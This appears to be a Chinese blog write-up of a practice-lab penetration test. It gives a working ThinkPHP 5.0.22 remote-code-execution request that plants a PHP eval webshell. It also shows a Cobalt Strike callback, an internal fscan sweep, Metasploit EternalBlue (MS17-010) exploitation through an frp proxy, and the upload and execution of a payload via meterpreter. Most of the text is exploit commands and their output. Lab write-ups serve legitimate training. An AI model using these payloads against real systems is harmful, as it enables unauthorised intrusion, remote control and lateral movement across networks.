首页 > 其他分享 >记一次靶场渗透

记一次靶场渗透

时间:2023-05-30 23:45:07浏览次数:37  
标签:一次 渗透 meterpreter 010 windows exploit exe 靶场 msf6

外围突破

thinkphp 5.0.22

GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak.php&vars[1][]=%3C%3Fphp+%40eval%28%24_POST%5B%27code%27%5D%29%3B HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 
Accept: */*
Connection: close

getshell
image
禁用函数,尝试Bypass
image
直接CS上线
image
fscan内网大保健

[+] 10.10.11.191	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] 10.10.11.197  (Windows 10 Pro 10240)

先打永恒之蓝
frp 开一条代理出来

msf6 > setg Proxies socks5:127.0.0.1:6000
Proxies => socks5:127.0.0.1:6000
msf6 > set ReverseAllowProxy true
ReverseAllowProxy => true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set  rhost 10.10.11.191
rhost => 10.10.11.191
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

获得交互shell
image
内网不出网,转发上线

meterpreter > upload ~/shell.exe sys.exe
[*] Uploading  : /root/shell.exe -> sys.exe
[*] Uploaded 289.00 KiB of 289.00 KiB (100.0%): /root/shell.exe -> sys.exe
[*] Completed  : /root/shell.exe -> sys.exe
meterpreter > execute -f "sys.exe"
Process 2700 created.

image
接着内网大保健

标签:一次,渗透,meterpreter,010,windows,exploit,exe,靶场,msf6
From: https://www.cnblogs.com/V3g3t4ble/p/17444856.html

相关文章

  • 记一次成功的内网穿透
    为什么要内网穿透?还不是我访问不到我电脑,又弄不了带公网的宽带。上次去营业厅咨询说是要多加钱,笑死。我直接裸辞搬家。这次先尝试下web服务。准备:1.带公网ip服务器一个(那个厂的都可以,带公网ip能访问就行)。这里我选择白嫖的服务器,毕竟穷啊https://www.sanfengyun.com/ 2.......
  • VulnHub_DC-3渗透流程
    VulnHub_DC-3DC-3是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个flag、一个入口点并且根本没有任何线索。必须具备Linux技能和熟悉Linux命令行,以及一些使用基本渗透测试工具的经验。......
  • SSH协议-漏洞渗透挖掘
     ......
  • 记录一次ScrollViewer控件 经过大量文本数据卡顿的原因
     在WPF中,CanContentScroll是ScrollViewer控件的一个附加属性,它控制滚动视图中的内容是否按项或像素来滚动。当CanContentScroll设置为false时,表示ScrollViewer控件使用逐像素的滚动方式,这意味着滚动视图中的内容会以像素为单位进行滚动。在这种情况下,如果您需要展示......
  • VulnHub_DC-2渗透流程
    VulnHub_DC-2信息收集探测目标主机IP地址arp-scan-lnmap-sV-A-p-192.168.157.143得知开启80端口的http服务与7744端口开启的ssh访问网站拿flag1访问发现有域名但看不到ip,原因是DNS未转换在windows中DNS的域名文件在C:\windows\system32\drivers\etc\hosts修改......
  • web安全详解(渗透测试基础)
    一、Web基础知识1.http协议超文本传输协议是互联网上应用最广泛的一种网络协议。所有www文件都必须遵守的一个标准,是以ASCII码传输,建立在TCP/IP协议之上的应用层规范,简单点说就是一种固定的通讯规则。2.网络三种架构及特点网络应用程序架构包括三种:客户机/服务器结构(C/S)......
  • CleanMyMacX VS 腾讯柠檬,mac清理谁更谁更优秀?一次全面的对比评测
    本文参考资料:https://blog.csdn.net/weixin_55412152/article/details/130935370不是说macOS尽管用就可以了吗,怎么也需要清理?当然需要,只要是电脑系统,随着使用时间的变长,磁盘空间都会产生一些搞不清楚的、乱七八糟的东西。要是用户没有清理Mac电脑的需求,市场上也不会有那么多款Ma......
  • 渗透---WordPress网站
    WordPress简介WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用......
  • 渗透--WordPress网站
    WordPress简介WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用......
  • 用于表示上一次运算结果的特殊变量_
    >>>66>>>_6>>>2+35>>>_5>>>print("hello")hello>>>_5>>>a=2>3>>>aFalse>>>_Falsefor_inrange(3):print(_)for_inrange(n)一般......